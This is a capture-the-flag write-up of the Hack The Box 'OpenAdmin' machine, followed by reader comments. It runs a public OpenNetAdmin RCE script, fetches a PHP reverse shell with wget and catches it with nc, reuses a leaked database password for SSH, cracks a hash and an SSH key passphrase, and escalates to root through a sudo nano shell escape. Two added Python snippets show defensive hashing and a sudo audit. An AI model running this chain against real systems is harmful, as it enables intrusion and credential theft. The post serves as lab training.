CTF – HTB – OpenAdmin

Today we solve the OpenAdmin box on hackthebox.eu.

First we start with a basic nmap scan :

# Nmap 7.80 scan initiated Mon Jan 13 18:22:36 2020 as: nmap -sC -sV -o TCP_scan
Nmap scan report for openadmin.htb (
Host is up (0.097s latency).
Not shown: 998 closed ports
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
|   256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
|_  256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jan 13 18:23:07 2020 -- 1 IP address (1 host up) scanned in 31.21 seconds

Port 80 gives us the default Apache page, so we proceed to scan directories with DirBuster:

root@kali:~/Desktop/htb/OpenAdmin# cat DirBusterReport-                                                                                    
DirBuster 1.0-RC1 - Report
Report produced on Mon Jan 13 18:20:13 EST 2020
Directories found during testing:

Dirs found with a 200 response:




Files found with a 301 responce:



Of all the directories, /ona looks the most interesting… It is running OpenNetAdmin version 18.1.1, which a quick search with searchsploit reveals to be vulnerable to RCE.

root@kali:~/Desktop/htb/OpenAdmin# searchsploit OpenNetAdmin
--------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                       |  Path
                                                                                                                     | (/usr/share/exploitdb/)
--------------------------------------------------------------------------------------------------------------------- ----------------------------------------
OpenNetAdmin 13.03.01 - Remote Code Execution                                                                        | exploits/php/webapps/26682.txt
OpenNetAdmin 18.1.1 - Command Injection Exploit (Metasploit)                                                         | exploits/php/webapps/47772.rb
OpenNetAdmin 18.1.1 - Remote Code Execution                                                                          | exploits/php/webapps/47691.sh
--------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result

We copy the file and execute it :

root@kali:~/Desktop/htb/OpenAdmin# cp /usr/share/exploitdb/exploits/php/webapps/47691.sh ./                                                                   
root@kali:~/Desktop/htb/OpenAdmin# chmod +x 47691.sh 
root@kali:~/Desktop/htb/OpenAdmin# dos2unix 47691.sh 
dos2unix: converting file 47691.sh to Unix format...
root@kali:~/Desktop/htb/OpenAdmin# bash 47691.sh
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

dos2unix is a simple binary that converts a text file to UNIX format. Then, to get a better shell, we upload a PHP reverse shell: we run a simple HTTP server with Python, then use wget on the victim’s machine to fetch it:

wget -O rev.php

We open a listener on our end and use curl to execute the php reverse shell :

root@kali:~/Desktop/htb/OpenAdmin# nc -lvp 9898                                                                                                               
listening on [any] 9898 ...                                                                                                                                   
connect to [] from openadmin.htb [] 58886                                                                                             
Linux openadmin 4.15.0-70-generic #79-Ubuntu SMP Tue Nov 12 10:36:11 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux                                                  
 00:16:10 up 15 min,  5 users,  load average: 5.25, 4.17, 2.16                                                                                                
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT                                                                                           
joanna   pts/1     00:02    5:57   0.06s  0.00s sshd: joanna [priv]                                                                           
jimmy    pts/3      00:03    8:49   0.03s  0.03s -bash                                                                                         
joanna   pts/5      00:08   57.00s  0.07s  0.07s -bash                                                                                         
jimmy    pts/6     00:08    4:50   0.04s  0.04s -bash                                                                                         
jimmy    pts/7      00:09   34.00s  0.05s  0.05s -bash                                                                                         
uid=33(www-data) gid=33(www-data) groups=33(www-data)                                                                                                         
/bin/sh: 0: can't access tty; job control turned off                                                                                                          
$ $ python3 -c "import pty;pty.spawn('/bin/bash');"                                                                                                           

We then explore the /ona directory and find MySQL credentials, which we use to log in as user jimmy over SSH:

www-data@openadmin:/var/www/ona/local/config$ ls -la                                                                                                          
ls -la                                                                                                                                                        
total 16                                                                                                                                                      
drwxrwxr-x 2 www-data www-data 4096 Nov 21 16:51 .                                                                                                            
drwxrwxr-x 5 www-data www-data 4096 Jan  3  2018 ..                                                                                                           
-rw-r--r-- 1 www-data www-data  426 Nov 21 16:51 database_settings.inc.php                                                                                    
-rw-rw-r-- 1 www-data www-data 1201 Jan  3  2018 motd.txt.example                                                                                             
-rw-r--r-- 1 www-data www-data    0 Nov 21 16:28 run_installer                                                                                                

$ona_contexts=array (
  'DEFAULT' => 
  array (
    'databases' => 
    array (
      0 => 
      array (
        'db_type' => 'mysqli',
        'db_host' => 'localhost',
        'db_login' => 'ona_sys',
        'db_passwd' => 'n1nj4W4rri0R!',
        'db_database' => 'ona_default',
        'db_debug' => false,
    'description' => 'Default data context',
    'context_color' => '#D3DBFF',

root@kali:~/Desktop/htb/OpenAdmin# ssh jimmy@
jimmy@'s password: 
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Tue Jan 28 00:51:40 UTC 2020

  System load:  0.25              Processes:             421
  Usage of /:   49.4% of 7.81GB   Users logged in:       1
  Memory usage: 33%               IP address for ens160:
  Swap usage:   0%

 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:

41 packages can be updated.
12 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Tue Jan 28 00:48:30 2020 from

Continuing, we visit the /var/www/internal/ folder, which is owned by jimmy, the user we now have access to. The folder contains 3 PHP files: index.php, which simply contains a form that sends a POST request and verifies that the username is ‘jimmy’ and that the password matches a hard-coded SHA-512 hash, then redirects to main.php when the credentials are good; and main.php, which simply echoes the id_rsa of the user joanna, the account we will have to pivot to.


      <h2>Enter Username and Password</h2>
      <div class = "container form-signin">
        <h2 class="featurette-heading">Login Restricted.<span class="text-muted"></span></h2>
            $msg = '';

            if (isset($_POST['login']) && !empty($_POST['username']) && !empty($_POST['password'])) {
              if ($_POST['username'] == 'jimmy' && hash('sha512',$_POST['password']) == '00e302ccdcf1c60b8ad50ea50cf72b939705f49f40f0dc658801b4680b7d758eebdc2e9f9ba8ba3ef8a8bb9a796d34ba2e856838ee9bdde852b8ec3b3a0523b1') {
                  $_SESSION['username'] = 'jimmy';
                  header("Location: /main.php");
              } else {
                  $msg = 'Wrong username or password.';


<?php session_start(); if (!isset ($_SESSION['username'])) { header("Location: /index.php"); }; 
# Open Admin Trusted
# OpenAdmin
$output = shell_exec('cat /home/joanna/.ssh/id_rsa');
echo "<pre>$output</pre>";
<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session

We start by cracking the sha-512 hash :

root@kali:~/Desktop/htb/OpenAdmin# cat hash                                                                                                                   
root@kali:~/Desktop/htb/OpenAdmin# john --format=raw-sha512 --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-SHA512 [SHA512 256/256 AVX2 4x])
Warning: poor OpenMP scalability for this hash type, consider --fork=2
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:02 25.63% (ETA: 20:01:49) 0g/s 1751Kp/s 1751Kc/s 1751KC/s shafous..shadowfreee
root@kali:~/Desktop/htb/OpenAdmin# john --show hash
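
The check in index.php stores a single unsalted SHA-512 digest, which is why a wordlist run is enough to recover the password. As an added example (not code from the box or from the original post), the same scheme is shown here in Python next to a salted, iterated one with a constant-time comparison; the iteration count, the record format and the sample password are assumptions.

```python
import hashlib
import hmac
import os

ITERATIONS = 210_000  # assumed work factor; tune it to your own hardware


def weak_hash(password):
    """The scheme index.php uses: one unsalted SHA-512 round."""
    return hashlib.sha512(password.encode()).hexdigest()


def strong_hash(password, salt=None):
    """Salted PBKDF2-HMAC-SHA512, stored as 'iterations$salt$digest'."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha512", password.encode(), salt, ITERATIONS)
    return f"{ITERATIONS}${salt.hex()}${digest.hex()}"


def verify(password, record):
    """Recompute with the stored salt and compare in constant time."""
    try:
        iterations, salt_hex, digest_hex = record.split("$")
        salt = bytes.fromhex(salt_hex)
        expected = bytes.fromhex(digest_hex)
        candidate = hashlib.pbkdf2_hmac(
            "sha512", password.encode(), salt, int(iterations)
        )
    except ValueError:
        return False  # malformed record: fail closed
    return hmac.compare_digest(candidate, expected)


if __name__ == "__main__":
    pw = "constructed-sample-pw"  # constructed value, not from the box
    # Unsalted: every account with this password stores the same digest,
    # so one precomputed wordlist covers all of them.
    print(weak_hash(pw) == weak_hash(pw))
    # Salted and iterated: two records for the same password differ, and
    # each guess costs ITERATIONS rounds instead of one.
    first, second = strong_hash(pw), strong_hash(pw)
    print(first != second, verify(pw, first), verify("wrong", first))
```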

We can then send a POST request with the correct data to our page. However, it is not hosted in the main directory… A look at the listening ports shows us that port 52846 is open, so we send our request there:

jimmy@openadmin:/var/www/internal$ netstat -ano                                                                                                               
Active Internet connections (servers and established)                                                                                                         
Proto Recv-Q Send-Q Local Address           Foreign Address         State       Timer                                                                         
tcp        0      0*               LISTEN      off (0.00/0/0)                                                                
tcp        0      0*               LISTEN      off (0.00/0/0)                                                                
tcp        0      0 *               LISTEN      off (0.00/0/0)                                                                
tcp        0      0    *               LISTEN      off (0.00/0/0)   
jimmy@openadmin:/var/www/internal$ curl -d "username=jimmy&password=Revealed" -X POST http://localhost:52846/main.php                                         
<pre>-----BEGIN RSA PRIVATE KEY-----                                                                                                                          
Proc-Type: 4,ENCRYPTED                                                                                                                                        
DEK-Info: AES-128-CBC,2AF25344B8391A25A9B318F3FD767D6D                                                                                                        
<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session

The next step is to crack this SSH key to get its passphrase; then we can log in as the joanna user:

root@kali:~/Desktop/htb/OpenAdmin# python ssh2john.py id_rsa

root@kali:~/Desktop/htb/OpenAdmin# john id_rsa_to_crack --format=SSH --wordlist=/usr/share/wordlists/rockyou.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:03 15.75% (ETA: 18:45:29) 0g/s 809092p/s 809092c/s 809092C/s zumiez33..zumiewan
0g 0:00:00:05 30.40% (ETA: 18:45:26) 0g/s 893846p/s 893846c/s 893846C/s prinny7..prinni123
0g 0:00:00:08 47.95% (ETA: 18:45:26) 0g/s 865528p/s 865528c/s 865528C/s jlb2qe..jlb2180
bloodninjas      (id_rsa)
1g 0:00:00:15 DONE (2020-01-27 18:45) 0.06281g/s 900860p/s 900860c/s 900860C/sa6_123..*7¡Vamos!
Session completed

We then log in as joanna and quickly find our way to root:

root@kali:~/Desktop/htb/OpenAdmin# ssh -i id_rsa joanna@
Enter passphrase for key 'id_rsa': 
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Tue Jan 28 01:15:03 UTC 2020

  System load:  0.21              Processes:             238
  Usage of /:   49.2% of 7.81GB   Users logged in:       1
  Memory usage: 33%               IP address for ens160:
  Swap usage:   0%

 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:

41 packages can be updated.
12 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Thu Jan  2 21:12:40 2020 from
joanna@openadmin:~$ sudo -l
Matching Defaults entries for joanna on openadmin:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User joanna may run the following commands on openadmin:
    (ALL) NOPASSWD: /bin/nano /opt/priv

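Since we can execute /bin/nano as root, we can easily escape to a shell from inside the editor; GTFOBins documents the technique. Note that the second line below is not typed in the terminal: it is entered inside nano after pressing ^R^X.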

sudo /bin/nano /opt/priv
reset; sh 1>&0 2>&0
# id
uid=0(root) gid=0(root) groups=0(root)
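
The sudo rule above hands joanna an interactive editor running as root. As an added example (not part of the original post), this Python audit parses `sudo -l` output and flags rules of that kind; the ESCAPABLE list and the two extra sample rules are assumptions made for the example.

```python
import re

# Programs that let the user run commands from inside their own interface.
# Short, non-exhaustive list assumed for this example; extend it from GTFOBins.
ESCAPABLE = {"nano", "vi", "vim", "less", "more", "man", "ed", "emacs"}

# Constructed sample: the rule joanna has on this box, plus two made-up rules.
SAMPLE_SUDO_L = """\
User joanna may run the following commands on openadmin:
    (ALL) NOPASSWD: /bin/nano /opt/priv
    (root) /usr/bin/apt-get update
    (ALL : ALL) NOPASSWD: ALL
"""

# "(runas) [TAG: ...] command[, command ...]" as printed by `sudo -l`.
RULE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$"
)


def audit_sudo_l(text):
    """Return (runas, command, reasons) for every rule worth reviewing."""
    findings = []
    for line in text.splitlines():
        m = RULE.match(line)
        if not m:
            continue  # header, Defaults line or blank line
        runas = m["runas"].split(":")[0].strip()
        nopasswd = "NOPASSWD:" in m["tags"]
        # Commands are comma-separated; "\," is an escaped comma in arguments.
        for cmd in re.split(r"(?<!\\),\s*", m["cmds"].strip()):
            parts = cmd.split()
            if not parts:
                continue
            name = parts[0].rsplit("/", 1)[-1]
            reasons = []
            if parts[0] == "ALL":
                reasons.append("any command allowed")
            elif name in ESCAPABLE:
                reasons.append(f"{name} can start a shell; grant 'sudoedit <file>' instead")
            if reasons and nopasswd:
                reasons.append("NOPASSWD: no re-authentication")
            if reasons:
                findings.append((runas, cmd, reasons))
    return findings


if __name__ == "__main__":
    for runas, cmd, reasons in audit_sudo_l(SAMPLE_SUDO_L):
        print(f"[review] as {runas}: {cmd} -> {'; '.join(reasons)}")
```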

And we owned the box!

Thanks for reading!

3 thoughts on “CTF – HTB – OpenAdmin”

  1. The only part I am stuck on is privilege escalation from joanna to root. I literally pasted this from GTFO bins and changed the first line to what we have rights to execute

    “sudo /bin/nano /opt/priv
    reset; sh 1>&0 2>&0”

    So it nano’s the file priv in /opt/
    and inside priv I have
    reset; sh 1>&0 2>&0”

    but when I type id in the command line I’m still Joanna, have I done something wrong? 🙁

    1. Hey Jake,
      You can’t copy paste all of it.
      ^R^X is not a command, it is what you have to press to open the shell in the nano binary. Then you input the command “reset; sh 1>&0 2>&0”.
